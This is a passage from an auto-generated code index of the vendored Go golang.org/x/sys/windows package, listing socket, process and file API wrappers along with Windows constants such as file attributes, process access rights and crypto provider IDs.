Socket(domain, typ, proto int) (fd Handle, err error) { function SetsockoptInt (line 1064) | func SetsockoptInt(fd Handle, level, opt int, value int) (err error) { function Bind (line 1069) | func Bind(fd Handle, sa Sockaddr) (err error) { function Connect (line 1077) | func Connect(fd Handle, sa Sockaddr) (err error) { function GetBestInterfaceEx (line 1085) | func GetBestInterfaceEx(sa Sockaddr, pdwBestIfIndex *uint32) (err error) { function Getsockname (line 1093) | func Getsockname(fd Handle) (sa Sockaddr, err error) { function Getpeername (line 1102) | func Getpeername(fd Handle) (sa Sockaddr, err error) { function Listen (line 1111) | func Listen(s Handle, n int) (err error) { function Shutdown (line 1115) | func Shutdown(fd Handle, how int) (err error) { function WSASendto (line 1119) | func WSASendto(s Handle, bufs *WSABuf, bufcnt uint32, sent *uint32, flag... function LoadGetAddrInfo (line 1131) | func LoadGetAddrInfo() error { function LoadConnectEx (line 1141) | func LoadConnectEx() error { function connectEx (line 1161) | func connectEx(s Handle, name unsafe.Pointer, namelen int32, sendBuf *by... function ConnectEx (line 1173) | func ConnectEx(fd Handle, sa Sockaddr, sendBuf *byte, sendDataLen uint32... function loadWSASendRecvMsg (line 1192) | func loadWSASendRecvMsg() error { function WSASendMsg (line 1222) | func WSASendMsg(fd Handle, msg *WSAMsg, flags uint32, bytesSent *uint32,... function WSARecvMsg (line 1234) | func WSARecvMsg(fd Handle, msg *WSAMsg, bytesReceived *uint32, overlappe... type Rusage (line 1247) | type Rusage struct type WaitStatus (line 1254) | type WaitStatus struct method Exited (line 1258) | func (w WaitStatus) Exited() bool { return true } method ExitStatus (line 1260) | func (w WaitStatus) ExitStatus() int { return int(w.ExitCode) } method Signal (line 1262) | func (w WaitStatus) Signal() Signal { return -1 } method CoreDump (line 1264) | func (w WaitStatus) CoreDump() bool { return false } method Stopped (line 1266) | func (w WaitStatus) Stopped() bool { return false } method Continued (line 1268) | func (w WaitStatus) Continued() bool { return false } method StopSignal (line 1270) | func (w WaitStatus) StopSignal() Signal { return -1 } method Signaled (line 1272) | func (w WaitStatus) Signaled() bool { return false } method TrapCause (line 1274) | func (w WaitStatus) TrapCause() int { return -1 } type Timespec (line 1278) | type Timespec struct function TimespecToNsec (line 1283) | func TimespecToNsec(ts Timespec) int64 { return int64(ts.Sec)*1e9 + int6... function NsecToTimespec (line 1285) | func NsecToTimespec(nsec int64) (ts Timespec) { function Accept (line 1293) | func Accept(fd Handle) (nfd Handle, sa Sockaddr, err error) { return 0, ... function Recvfrom (line 1295) | func Recvfrom(fd Handle, p []byte, flags int) (n int, from Sockaddr, err... function Sendto (line 1307) | func Sendto(fd Handle, p []byte, flags int, to Sockaddr) (err error) { function SetsockoptTimeval (line 1315) | func SetsockoptTimeval(fd Handle, level, opt int, tv *Timeval) (err erro... type Linger (line 1324) | type Linger struct type sysLinger (line 1329) | type sysLinger struct type IPMreq (line 1334) | type IPMreq struct type IPv6Mreq (line 1339) | type IPv6Mreq struct function GetsockoptInt (line 1344) | func GetsockoptInt(fd Handle, level, opt int) (int, error) { function SetsockoptLinger (line 1351) | func SetsockoptLinger(fd Handle, level, opt int, l *Linger) (err error) { function SetsockoptInet4Addr (line 1356) | func SetsockoptInet4Addr(fd Handle, level, opt int, value [4]byte) (err ... function SetsockoptIPMreq (line 1359) | func SetsockoptIPMreq(fd Handle, level, opt int, mreq *IPMreq) (err erro... function SetsockoptIPv6Mreq (line 1362) | func SetsockoptIPv6Mreq(fd Handle, level, opt int, mreq *IPv6Mreq) (err ... function EnumProcesses (line 1366) | func EnumProcesses(processIds []uint32, bytesReturned *uint32) error { function Getpid (line 1377) | func Getpid() (pid int) { return int(GetCurrentProcessId()) } function FindFirstFile (line 1379) | func FindFirstFile(name *uint16, data *Win32finddata) (handle Handle, er... function FindNextFile (line 1396) | func FindNextFile(handle Handle, data *Win32finddata) (err error) { function getProcessEntry (line 1405) | func getProcessEntry(pid int) (*ProcessEntry32, error) { function Getppid (line 1427) | func Getppid() (ppid int) { function Fchdir (line 1436) | func Fchdir(fd Handle) (err error) { return syscall.EWINDOWS } function Link (line 1437) | func Link(oldpath, newpath string) (err error) { return syscall.EWINDOWS } function Symlink (line 1438) | func Symlink(path, link string) (err error) { return syscall.EWINDOWS } function Fchmod (line 1440) | func Fchmod(fd Handle, mode uint32) (err error) { return syscall.... function Chown (line 1441) | func Chown(path string, uid int, gid int) (err error) { return syscall.... function Lchown (line 1442) | func Lchown(path string, uid int, gid int) (err error) { return syscall.... function Fchown (line 1443) | func Fchown(fd Handle, uid int, gid int) (err error) { return syscall.... function Getuid (line 1445) | func Getuid() (uid int) { return -1 } function Geteuid (line 1446) | func Geteuid() (euid int) { return -1 } function Getgid (line 1447) | func Getgid() (gid int) { return -1 } function Getegid (line 1448) | func Getegid() (egid int) { return -1 } function Getgroups (line 1449) | func Getgroups() (gids []int, err error) { return nil, syscall.EWINDOWS } type Signal (line 1451) | type Signal method Signal (line 1453) | func (s Signal) Signal() {} method String (line 1455) | func (s Signal) String() string { function LoadCreateSymbolicLink (line 1465) | func LoadCreateSymbolicLink() error { function Readlink (line 1470) | func Readlink(path string, buf []byte) (n int, err error) { function GUIDFromString (line 1508) | func GUIDFromString(str string) (GUID, error) { function GenerateGUID (line 1522) | func GenerateGUID() (GUID, error) { method String (line 1533) | func (guid GUID) String() string { function KnownFolderPath (line 1544) | func KnownFolderPath(folderID *KNOWNFOLDERID, flags uint32) (string, err... method KnownFolderPath (line 1550) | func (t Token) KnownFolderPath(folderID *KNOWNFOLDERID, flags uint32) (s... function RtlGetVersion (line 1562) | func RtlGetVersion() *OsVersionInfoEx { function RtlGetNtVersionNumbers (line 1575) | func RtlGetNtVersionNumbers() (majorVersion, minorVersion, buildNumber u... function GetProcessPreferredUILanguages (line 1582) | func GetProcessPreferredUILanguages(flags uint32) ([]string, error) { function GetThreadPreferredUILanguages (line 1587) | func GetThreadPreferredUILanguages(flags uint32) ([]string, error) { function GetUserPreferredUILanguages (line 1592) | func GetUserPreferredUILanguages(flags uint32) ([]string, error) { function GetSystemPreferredUILanguages (line 1597) | func GetSystemPreferredUILanguages(flags uint32) ([]string, error) { function getUILanguages (line 1601) | func getUILanguages(flags uint32, f func(flags uint32, numLanguages *uin... function SetConsoleCursorPosition (line 1632) | func SetConsoleCursorPosition(console Handle, position Coord) error { function GetStartupInfo (line 1636) | func GetStartupInfo(startupInfo *StartupInfo) error { method Errno (line 1641) | func (s NTStatus) Errno() syscall.Errno { function langID (line 1645) | func langID(pri, sub uint16) uint32 { return uint32(sub)<<10 | uint32(pr... method Error (line 1647) | func (s NTStatus) Error() string { function NewNTUnicodeString (line 1663) | func NewNTUnicodeString(s string) (*NTUnicodeString, error) { method Slice (line 1674) | func (s *NTUnicodeString) Slice() []uint16 { method String (line 1679) | func (s *NTUnicodeString) String() string { function NewNTString (line 1687) | func NewNTString(s string) (*NTString, error) { method Slice (line 1698) | func (s *NTString) Slice() []byte { method String (line 1703) | func (s *NTString) String() string { function FindResource (line 1708) | func FindResource(module Handle, name, resType ResourceIDOrString) (Hand... function LoadResourceData (line 1739) | func LoadResourceData(module, resInfo Handle) (data []byte, err error) { type PSAPI_WORKING_SET_EX_BLOCK (line 1757) | type PSAPI_WORKING_SET_EX_BLOCK method Valid (line 1761) | func (b PSAPI_WORKING_SET_EX_BLOCK) Valid() bool { method ShareCount (line 1766) | func (b PSAPI_WORKING_SET_EX_BLOCK) ShareCount() uint64 { method Win32Protection (line 1772) | func (b PSAPI_WORKING_SET_EX_BLOCK) Win32Protection() uint64 { method Shared (line 1778) | func (b PSAPI_WORKING_SET_EX_BLOCK) Shared() bool { method Node (line 1783) | func (b PSAPI_WORKING_SET_EX_BLOCK) Node() uint64 { method Locked (line 1789) | func (b PSAPI_WORKING_SET_EX_BLOCK) Locked() bool { method LargePage (line 1795) | func (b PSAPI_WORKING_SET_EX_BLOCK) LargePage() bool { method Bad (line 1801) | func (b PSAPI_WORKING_SET_EX_BLOCK) Bad() bool { method intField (line 1806) | func (b PSAPI_WORKING_SET_EX_BLOCK) intField(start, length int) uint64 { type PSAPI_WORKING_SET_EX_INFORMATION (line 1817) | type PSAPI_WORKING_SET_EX_INFORMATION struct function CreatePseudoConsole (line 1825) | func CreatePseudoConsole(size Coord, in Handle, out Handle, flags uint32... function ResizePseudoConsole (line 1832) | func ResizePseudoConsole(pconsole Handle, size Coord) error { FILE: vendor/golang.org/x/sys/windows/types_windows.go type NTStatus (line 15) | type NTStatus constant O_RDONLY (line 19) | O_RDONLY = 0x00000 constant O_WRONLY (line 20) | O_WRONLY = 0x00001 constant O_RDWR (line 21) | O_RDWR = 0x00002 constant O_CREAT (line 22) | O_CREAT = 0x00040 constant O_EXCL (line 23) | O_EXCL = 0x00080 constant O_NOCTTY (line 24) | O_NOCTTY = 0x00100 constant O_TRUNC (line 25) | O_TRUNC = 0x00200 constant O_NONBLOCK (line 26) | O_NONBLOCK = 0x00800 constant O_APPEND (line 27) | O_APPEND = 0x00400 constant O_SYNC (line 28) | O_SYNC = 0x01000 constant O_ASYNC (line 29) | O_ASYNC = 0x02000 constant O_CLOEXEC (line 30) | O_CLOEXEC = 0x80000 constant SIGHUP (line 35) | SIGHUP = Signal(0x1) constant SIGINT (line 36) | SIGINT = Signal(0x2) constant SIGQUIT (line 37) | SIGQUIT = Signal(0x3) constant SIGILL (line 38) | SIGILL = Signal(0x4) constant SIGTRAP (line 39) | SIGTRAP = Signal(0x5) constant SIGABRT (line 40) | SIGABRT = Signal(0x6) constant SIGBUS (line 41) | SIGBUS = Signal(0x7) constant SIGFPE (line 42) | SIGFPE = Signal(0x8) constant SIGKILL (line 43) | SIGKILL = Signal(0x9) constant SIGSEGV (line 44) | SIGSEGV = Signal(0xb) constant SIGPIPE (line 45) | SIGPIPE = Signal(0xd) constant SIGALRM (line 46) | SIGALRM = Signal(0xe) constant SIGTERM (line 47) | SIGTERM = Signal(0xf) constant FILE_READ_DATA (line 69) | FILE_READ_DATA = 0x00000001 constant FILE_READ_ATTRIBUTES (line 70) | FILE_READ_ATTRIBUTES = 0x00000080 constant FILE_READ_EA (line 71) | FILE_READ_EA = 0x00000008 constant FILE_WRITE_DATA (line 72) | FILE_WRITE_DATA = 0x00000002 constant FILE_WRITE_ATTRIBUTES (line 73) | FILE_WRITE_ATTRIBUTES = 0x00000100 constant FILE_WRITE_EA (line 74) | FILE_WRITE_EA = 0x00000010 constant FILE_APPEND_DATA (line 75) | FILE_APPEND_DATA = 0x00000004 constant FILE_EXECUTE (line 76) | FILE_EXECUTE = 0x00000020 constant FILE_GENERIC_READ (line 78) | FILE_GENERIC_READ = STANDARD_RIGHTS_READ | FILE_READ_DATA | FILE_READ... constant FILE_GENERIC_WRITE (line 79) | FILE_GENERIC_WRITE = STANDARD_RIGHTS_WRITE | FILE_WRITE_DATA | FILE_WR... constant FILE_GENERIC_EXECUTE (line 80) | FILE_GENERIC_EXECUTE = STANDARD_RIGHTS_EXECUTE | FILE_READ_ATTRIBUTES | ... constant FILE_LIST_DIRECTORY (line 82) | FILE_LIST_DIRECTORY = 0x00000001 constant FILE_TRAVERSE (line 83) | FILE_TRAVERSE = 0x00000020 constant FILE_SHARE_READ (line 85) | FILE_SHARE_READ = 0x00000001 constant FILE_SHARE_WRITE (line 86) | FILE_SHARE_WRITE = 0x00000002 constant FILE_SHARE_DELETE (line 87) | FILE_SHARE_DELETE = 0x00000004 constant FILE_ATTRIBUTE_READONLY (line 89) | FILE_ATTRIBUTE_READONLY = 0x00000001 constant FILE_ATTRIBUTE_HIDDEN (line 90) | FILE_ATTRIBUTE_HIDDEN = 0x00000002 constant FILE_ATTRIBUTE_SYSTEM (line 91) | FILE_ATTRIBUTE_SYSTEM = 0x00000004 constant FILE_ATTRIBUTE_DIRECTORY (line 92) | FILE_ATTRIBUTE_DIRECTORY = 0x00000010 constant FILE_ATTRIBUTE_ARCHIVE (line 93) | FILE_ATTRIBUTE_ARCHIVE = 0x00000020 constant FILE_ATTRIBUTE_DEVICE (line 94) | FILE_ATTRIBUTE_DEVICE = 0x00000040 constant FILE_ATTRIBUTE_NORMAL (line 95) | FILE_ATTRIBUTE_NORMAL = 0x00000080 constant FILE_ATTRIBUTE_TEMPORARY (line 96) | FILE_ATTRIBUTE_TEMPORARY = 0x00000100 constant FILE_ATTRIBUTE_SPARSE_FILE (line 97) | FILE_ATTRIBUTE_SPARSE_FILE = 0x00000200 constant FILE_ATTRIBUTE_REPARSE_POINT (line 98) | FILE_ATTRIBUTE_REPARSE_POINT = 0x00000400 constant FILE_ATTRIBUTE_COMPRESSED (line 99) | FILE_ATTRIBUTE_COMPRESSED = 0x00000800 constant FILE_ATTRIBUTE_OFFLINE (line 100) | FILE_ATTRIBUTE_OFFLINE = 0x00001000 constant FILE_ATTRIBUTE_NOT_CONTENT_INDEXED (line 101) | FILE_ATTRIBUTE_NOT_CONTENT_INDEXED = 0x00002000 constant FILE_ATTRIBUTE_ENCRYPTED (line 102) | FILE_ATTRIBUTE_ENCRYPTED = 0x00004000 constant FILE_ATTRIBUTE_INTEGRITY_STREAM (line 103) | FILE_ATTRIBUTE_INTEGRITY_STREAM = 0x00008000 constant FILE_ATTRIBUTE_VIRTUAL (line 104) | FILE_ATTRIBUTE_VIRTUAL = 0x00010000 constant FILE_ATTRIBUTE_NO_SCRUB_DATA (line 105) | FILE_ATTRIBUTE_NO_SCRUB_DATA = 0x00020000 constant FILE_ATTRIBUTE_RECALL_ON_OPEN (line 106) | FILE_ATTRIBUTE_RECALL_ON_OPEN = 0x00040000 constant FILE_ATTRIBUTE_RECALL_ON_DATA_ACCESS (line 107) | FILE_ATTRIBUTE_RECALL_ON_DATA_ACCESS = 0x00400000 constant INVALID_FILE_ATTRIBUTES (line 109) | INVALID_FILE_ATTRIBUTES = 0xffffffff constant CREATE_NEW (line 111) | CREATE_NEW = 1 constant CREATE_ALWAYS (line 112) | CREATE_ALWAYS = 2 constant OPEN_EXISTING (line 113) | OPEN_EXISTING = 3 constant OPEN_ALWAYS (line 114) | OPEN_ALWAYS = 4 constant TRUNCATE_EXISTING (line 115) | TRUNCATE_EXISTING = 5 constant FILE_FLAG_OPEN_REQUIRING_OPLOCK (line 117) | FILE_FLAG_OPEN_REQUIRING_OPLOCK = 0x00040000 constant FILE_FLAG_FIRST_PIPE_INSTANCE (line 118) | FILE_FLAG_FIRST_PIPE_INSTANCE = 0x00080000 constant FILE_FLAG_OPEN_NO_RECALL (line 119) | FILE_FLAG_OPEN_NO_RECALL = 0x00100000 constant FILE_FLAG_OPEN_REPARSE_POINT (line 120) | FILE_FLAG_OPEN_REPARSE_POINT = 0x00200000 constant FILE_FLAG_SESSION_AWARE (line 121) | FILE_FLAG_SESSION_AWARE = 0x00800000 constant FILE_FLAG_POSIX_SEMANTICS (line 122) | FILE_FLAG_POSIX_SEMANTICS = 0x01000000 constant FILE_FLAG_BACKUP_SEMANTICS (line 123) | FILE_FLAG_BACKUP_SEMANTICS = 0x02000000 constant FILE_FLAG_DELETE_ON_CLOSE (line 124) | FILE_FLAG_DELETE_ON_CLOSE = 0x04000000 constant FILE_FLAG_SEQUENTIAL_SCAN (line 125) | FILE_FLAG_SEQUENTIAL_SCAN = 0x08000000 constant FILE_FLAG_RANDOM_ACCESS (line 126) | FILE_FLAG_RANDOM_ACCESS = 0x10000000 constant FILE_FLAG_NO_BUFFERING (line 127) | FILE_FLAG_NO_BUFFERING = 0x20000000 constant FILE_FLAG_OVERLAPPED (line 128) | FILE_FLAG_OVERLAPPED = 0x40000000 constant FILE_FLAG_WRITE_THROUGH (line 129) | FILE_FLAG_WRITE_THROUGH = 0x80000000 constant HANDLE_FLAG_INHERIT (line 131) | HANDLE_FLAG_INHERIT = 0x00000001 constant STARTF_USESTDHANDLES (line 132) | STARTF_USESTDHANDLES = 0x00000100 constant STARTF_USESHOWWINDOW (line 133) | STARTF_USESHOWWINDOW = 0x00000001 constant DUPLICATE_CLOSE_SOURCE (line 134) | DUPLICATE_CLOSE_SOURCE = 0x00000001 constant DUPLICATE_SAME_ACCESS (line 135) | DUPLICATE_SAME_ACCESS = 0x00000002 constant STD_INPUT_HANDLE (line 137) | STD_INPUT_HANDLE = -10 & (1<<32 - 1) constant STD_OUTPUT_HANDLE (line 138) | STD_OUTPUT_HANDLE = -11 & (1<<32 - 1) constant STD_ERROR_HANDLE (line 139) | STD_ERROR_HANDLE = -12 & (1<<32 - 1) constant FILE_BEGIN (line 141) | FILE_BEGIN = 0 constant FILE_CURRENT (line 142) | FILE_CURRENT = 1 constant FILE_END (line 143) | FILE_END = 2 constant LANG_ENGLISH (line 145) | LANG_ENGLISH = 0x09 constant SUBLANG_ENGLISH_US (line 146) | SUBLANG_ENGLISH_US = 0x01 constant FORMAT_MESSAGE_ALLOCATE_BUFFER (line 148) | FORMAT_MESSAGE_ALLOCATE_BUFFER = 256 constant FORMAT_MESSAGE_IGNORE_INSERTS (line 149) | FORMAT_MESSAGE_IGNORE_INSERTS = 512 constant FORMAT_MESSAGE_FROM_STRING (line 150) | FORMAT_MESSAGE_FROM_STRING = 1024 constant FORMAT_MESSAGE_FROM_HMODULE (line 151) | FORMAT_MESSAGE_FROM_HMODULE = 2048 constant FORMAT_MESSAGE_FROM_SYSTEM (line 152) | FORMAT_MESSAGE_FROM_SYSTEM = 4096 constant FORMAT_MESSAGE_ARGUMENT_ARRAY (line 153) | FORMAT_MESSAGE_ARGUMENT_ARRAY = 8192 constant FORMAT_MESSAGE_MAX_WIDTH_MASK (line 154) | FORMAT_MESSAGE_MAX_WIDTH_MASK = 255 constant MAX_PATH (line 156) | MAX_PATH = 260 constant MAX_LONG_PATH (line 157) | MAX_LONG_PATH = 32768 constant MAX_MODULE_NAME32 (line 159) | MAX_MODULE_NAME32 = 255 constant MAX_COMPUTERNAME_LENGTH (line 161) | MAX_COMPUTERNAME_LENGTH = 15 constant MAX_DHCPV6_DUID_LENGTH (line 163) | MAX_DHCPV6_DUID_LENGTH = 130 constant MAX_DNS_SUFFIX_STRING_LENGTH (line 165) | MAX_DNS_SUFFIX_STRING_LENGTH = 256 constant TIME_ZONE_ID_UNKNOWN (line 167) | TIME_ZONE_ID_UNKNOWN = 0 constant TIME_ZONE_ID_STANDARD (line 168) | TIME_ZONE_ID_STANDARD = 1 constant TIME_ZONE_ID_DAYLIGHT (line 170) | TIME_ZONE_ID_DAYLIGHT = 2 constant IGNORE (line 171) | IGNORE = 0 constant INFINITE (line 172) | INFINITE = 0xffffffff constant WAIT_ABANDONED (line 174) | WAIT_ABANDONED = 0x00000080 constant WAIT_OBJECT_0 (line 175) | WAIT_OBJECT_0 = 0x00000000 constant WAIT_FAILED (line 176) | WAIT_FAILED = 0xFFFFFFFF constant PROCESS_CREATE_PROCESS (line 179) | PROCESS_CREATE_PROCESS = 0x0080 constant PROCESS_CREATE_THREAD (line 180) | PROCESS_CREATE_THREAD = 0x0002 constant PROCESS_DUP_HANDLE (line 181) | PROCESS_DUP_HANDLE = 0x0040 constant PROCESS_QUERY_INFORMATION (line 182) | PROCESS_QUERY_INFORMATION = 0x0400 constant PROCESS_QUERY_LIMITED_INFORMATION (line 183) | PROCESS_QUERY_LIMITED_INFORMATION = 0x1000 constant PROCESS_SET_INFORMATION (line 184) | PROCESS_SET_INFORMATION = 0x0200 constant PROCESS_SET_QUOTA (line 185) | PROCESS_SET_QUOTA = 0x0100 constant PROCESS_SUSPEND_RESUME (line 186) | PROCESS_SUSPEND_RESUME = 0x0800 constant PROCESS_TERMINATE (line 187) | PROCESS_TERMINATE = 0x0001 constant PROCESS_VM_OPERATION (line 188) | PROCESS_VM_OPERATION = 0x0008 constant PROCESS_VM_READ (line 189) | PROCESS_VM_READ = 0x0010 constant PROCESS_VM_WRITE (line 190) | PROCESS_VM_WRITE = 0x0020 constant THREAD_DIRECT_IMPERSONATION (line 193) | THREAD_DIRECT_IMPERSONATION = 0x0200 constant THREAD_GET_CONTEXT (line 194) | THREAD_GET_CONTEXT = 0x0008 constant THREAD_IMPERSONATE (line 195) | THREAD_IMPERSONATE = 0x0100 constant THREAD_QUERY_INFORMATION (line 196) | THREAD_QUERY_INFORMATION = 0x0040 constant THREAD_QUERY_LIMITED_INFORMATION (line 197) | THREAD_QUERY_LIMITED_INFORMATION = 0x0800 constant THREAD_SET_CONTEXT (line 198) | THREAD_SET_CONTEXT = 0x0010 constant THREAD_SET_INFORMATION (line 199) | THREAD_SET_INFORMATION = 0x0020 constant THREAD_SET_LIMITED_INFORMATION (line 200) | THREAD_SET_LIMITED_INFORMATION = 0x0400 constant THREAD_SET_THREAD_TOKEN (line 201) | THREAD_SET_THREAD_TOKEN = 0x0080 constant THREAD_SUSPEND_RESUME (line 202) | THREAD_SUSPEND_RESUME = 0x0002 constant THREAD_TERMINATE (line 203) | THREAD_TERMINATE = 0x0001 constant FILE_MAP_COPY (line 205) | FILE_MAP_COPY = 0x01 constant FILE_MAP_WRITE (line 206) | FILE_MAP_WRITE = 0x02 constant FILE_MAP_READ (line 207) | FILE_MAP_READ = 0x04 constant FILE_MAP_EXECUTE (line 208) | FILE_MAP_EXECUTE = 0x20 constant CTRL_C_EVENT (line 210) | CTRL_C_EVENT = 0 constant CTRL_BREAK_EVENT (line 211) | CTRL_BREAK_EVENT = 1 constant CTRL_CLOSE_EVENT (line 212) | CTRL_CLOSE_EVENT = 2 constant CTRL_LOGOFF_EVENT (line 213) | CTRL_LOGOFF_EVENT = 5 constant CTRL_SHUTDOWN_EVENT (line 214) | CTRL_SHUTDOWN_EVENT = 6 constant APPLICATION_ERROR (line 217) | APPLICATION_ERROR = 1 << 29 constant CREATE_BREAKAWAY_FROM_JOB (line 222) | CREATE_BREAKAWAY_FROM_JOB = 0x01000000 constant CREATE_DEFAULT_ERROR_MODE (line 223) | CREATE_DEFAULT_ERROR_MODE = 0x04000000 constant CREATE_NEW_CONSOLE (line 224) | CREATE_NEW_CONSOLE = 0x00000010 constant CREATE_NEW_PROCESS_GROUP (line 225) | CREATE_NEW_PROCESS_GROUP = 0x00000200 constant CREATE_NO_WINDOW (line 226) | CREATE_NO_WINDOW = 0x08000000 constant CREATE_PROTECTED_PROCESS (line 227) | CREATE_PROTECTED_PROCESS = 0x00040000 constant CREATE_PRESERVE_CODE_AUTHZ_LEVEL (line 228) | CREATE_PRESERVE_CODE_AUTHZ_LEVEL = 0x02000000 constant CREATE_SEPARATE_WOW_VDM (line 229) | CREATE_SEPARATE_WOW_VDM = 0x00000800 constant CREATE_SHARED_WOW_VDM (line 230) | CREATE_SHARED_WOW_VDM = 0x00001000 constant CREATE_SUSPENDED (line 231) | CREATE_SUSPENDED = 0x00000004 constant CREATE_UNICODE_ENVIRONMENT (line 232) | CREATE_UNICODE_ENVIRONMENT = 0x00000400 constant DEBUG_ONLY_THIS_PROCESS (line 233) | DEBUG_ONLY_THIS_PROCESS = 0x00000002 constant DEBUG_PROCESS (line 234) | DEBUG_PROCESS = 0x00000001 constant DETACHED_PROCESS (line 235) | DETACHED_PROCESS = 0x00000008 constant EXTENDED_STARTUPINFO_PRESENT (line 236) | EXTENDED_STARTUPINFO_PRESENT = 0x00080000 constant INHERIT_PARENT_AFFINITY (line 237) | INHERIT_PARENT_AFFINITY = 0x00010000 constant PROC_THREAD_ATTRIBUTE_PARENT_PROCESS (line 242) | PROC_THREAD_ATTRIBUTE_PARENT_PROCESS = 0x00020000 constant PROC_THREAD_ATTRIBUTE_HANDLE_LIST (line 243) | PROC_THREAD_ATTRIBUTE_HANDLE_LIST = 0x00020002 constant PROC_THREAD_ATTRIBUTE_GROUP_AFFINITY (line 244) | PROC_THREAD_ATTRIBUTE_GROUP_AFFINITY = 0x00030003 constant PROC_THREAD_ATTRIBUTE_PREFERRED_NODE (line 245) | PROC_THREAD_ATTRIBUTE_PREFERRED_NODE = 0x00020004 constant PROC_THREAD_ATTRIBUTE_IDEAL_PROCESSOR (line 246) | PROC_THREAD_ATTRIBUTE_IDEAL_PROCESSOR = 0x00030005 constant PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY (line 247) | PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY = 0x00020007 constant PROC_THREAD_ATTRIBUTE_UMS_THREAD (line 248) | PROC_THREAD_ATTRIBUTE_UMS_THREAD = 0x00030006 constant PROC_THREAD_ATTRIBUTE_PROTECTION_LEVEL (line 249) | PROC_THREAD_ATTRIBUTE_PROTECTION_LEVEL = 0x0002000b constant PROC_THREAD_ATTRIBUTE_PSEUDOCONSOLE (line 250) | PROC_THREAD_ATTRIBUTE_PSEUDOCONSOLE = 0x00020016 constant TH32CS_SNAPHEAPLIST (line 255) | TH32CS_SNAPHEAPLIST = 0x01 constant TH32CS_SNAPPROCESS (line 256) | TH32CS_SNAPPROCESS = 0x02 constant TH32CS_SNAPTHREAD (line 257) | TH32CS_SNAPTHREAD = 0x04 constant TH32CS_SNAPMODULE (line 258) | TH32CS_SNAPMODULE = 0x08 constant TH32CS_SNAPMODULE32 (line 259) | TH32CS_SNAPMODULE32 = 0x10 constant TH32CS_SNAPALL (line 260) | TH32CS_SNAPALL = TH32CS_SNAPHEAPLIST | TH32CS_SNAPMODULE | TH32CS_S... constant TH32CS_INHERIT (line 261) | TH32CS_INHERIT = 0x80000000 constant LIST_MODULES_32BIT (line 266) | LIST_MODULES_32BIT = 0x01 constant LIST_MODULES_64BIT (line 267) | LIST_MODULES_64BIT = 0x02 constant LIST_MODULES_ALL (line 268) | LIST_MODULES_ALL = 0x03 constant LIST_MODULES_DEFAULT (line 269) | LIST_MODULES_DEFAULT = 0x00 constant FILE_NOTIFY_CHANGE_FILE_NAME (line 274) | FILE_NOTIFY_CHANGE_FILE_NAME = 0x001 constant FILE_NOTIFY_CHANGE_DIR_NAME (line 275) | FILE_NOTIFY_CHANGE_DIR_NAME = 0x002 constant FILE_NOTIFY_CHANGE_ATTRIBUTES (line 276) | FILE_NOTIFY_CHANGE_ATTRIBUTES = 0x004 constant FILE_NOTIFY_CHANGE_SIZE (line 277) | FILE_NOTIFY_CHANGE_SIZE = 0x008 constant FILE_NOTIFY_CHANGE_LAST_WRITE (line 278) | FILE_NOTIFY_CHANGE_LAST_WRITE = 0x010 constant FILE_NOTIFY_CHANGE_LAST_ACCESS (line 279) | FILE_NOTIFY_CHANGE_LAST_ACCESS = 0x020 constant FILE_NOTIFY_CHANGE_CREATION (line 280) | FILE_NOTIFY_CHANGE_CREATION = 0x040 constant FILE_NOTIFY_CHANGE_SECURITY (line 281) | FILE_NOTIFY_CHANGE_SECURITY = 0x100 constant FILE_ACTION_ADDED (line 286) | FILE_ACTION_ADDED = iota + 1 constant FILE_ACTION_REMOVED (line 287) | FILE_ACTION_REMOVED constant FILE_ACTION_MODIFIED (line 288) | FILE_ACTION_MODIFIED constant FILE_ACTION_RENAMED_OLD_NAME (line 289) | FILE_ACTION_RENAMED_OLD_NAME constant FILE_ACTION_RENAMED_NEW_NAME (line 290) | FILE_ACTION_RENAMED_NEW_NAME constant PROV_RSA_FULL (line 296) | PROV_RSA_FULL = 1 constant PROV_RSA_SIG (line 297) | PROV_RSA_SIG = 2 constant PROV_DSS (line 298) | PROV_DSS = 3 constant PROV_FORTEZZA (line 299) | PROV_FORTEZZA = 4 constant PROV_MS_EXCHANGE (line 300) | PROV_MS_EXCHANGE = 5 constant PROV_SSL (line 301) | PROV_SSL = 6 constant PROV_RSA_SCHANNEL (line 302) | PROV_RSA_SCHANNEL = 12 constant PROV_DSS_DH (line 303) | PROV_DSS_DH = 13 constant PROV_EC_ECDSA_SIG (line 304) | PROV_EC_ECDSA_SIG = 14 constant PROV_EC_ECNRA_SIG (line 305) | PROV_EC_ECNRA_SIG = 15 constant PROV_EC_ECDSA_FULL (line 306) | PROV_EC_ECDSA_FULL = 16 constant PROV_EC_ECNRA_FULL (line 307) | PROV_EC_ECNRA_FULL = 17 constant PROV_DH_SCHANNEL (line 308) | PROV_DH_SCHANNEL = 18 constant PROV_SPYRUS_LYNKS (line 309) | PROV_SPYRUS_LYNKS = 20 constant PROV_RNG (line 310) | PROV_RNG = 21 constant PROV_INTEL_SEC (line 311) | PROV_INTEL_SEC = 22 constant PROV_REPLACE_OWF (line 312) | PROV_REPLACE_OWF = 23 constant PROV_RSA_AES (line 313) | PROV_RSA_AES = 24 constant CRYPT_VERIFYCONTEXT (line 316) | CRYPT_VERIFYCONTEXT = 0xF0000000 constant CRYPT_NEWKEYSET (line 317) | CRYPT_NEWKEYSET = 0x00000008 constant CRYPT_DELETEKEYSET (line 318) | CRYPT_DELETEKEYSET = 0x00000010 constant CRYPT_MACHINE_KEYSET (line 319) | CRYPT_MACHINE_KEYSET = 0x00000020 constant CRYPT_SILENT (line 320) | CRYPT_SILENT = 0x00000040 constant CRYPT_DEFAULT_CONTAINER_OPTIONAL (line 321) | CRYPT_DEFAULT_CONTAINER_OPTIONAL = 0x00000080 constant CRYPT_EXPORTABLE (line 324) | CRYPT_EXPORTABLE = 0x00000001 constant CRYPT_USER_PROTECTED (line 325) | CRYPT_USER_PROTECTED = 0x00000002 constant CRYPT_USER_KEYSET (line 326) | CRYPT_USER_KEYSET = 0x00001000 constant PKCS12_PREFER_CNG_KSP (line 327) | PKCS12_PREFER_CNG_KSP = 0x00000100 constant PKCS12_ALWAYS_CNG_KSP (line 328) | PKCS12_ALWAYS_CNG_KSP = 0x00000200 constant PKCS12_ALLOW_OVERWRITE_KEY (line 329) | PKCS12_ALLOW_OVERWRITE_KEY = 0x00004000 constant PKCS12_NO_PERSIST_KEY (line 330) | PKCS12_NO_PERSIST_KEY = 0x00008000 constant PKCS12_INCLUDE_EXTENDED_PROPERTIES (line 331) | PKCS12_INCLUDE_EXTENDED_PROPERTIES = 0x00000010 constant 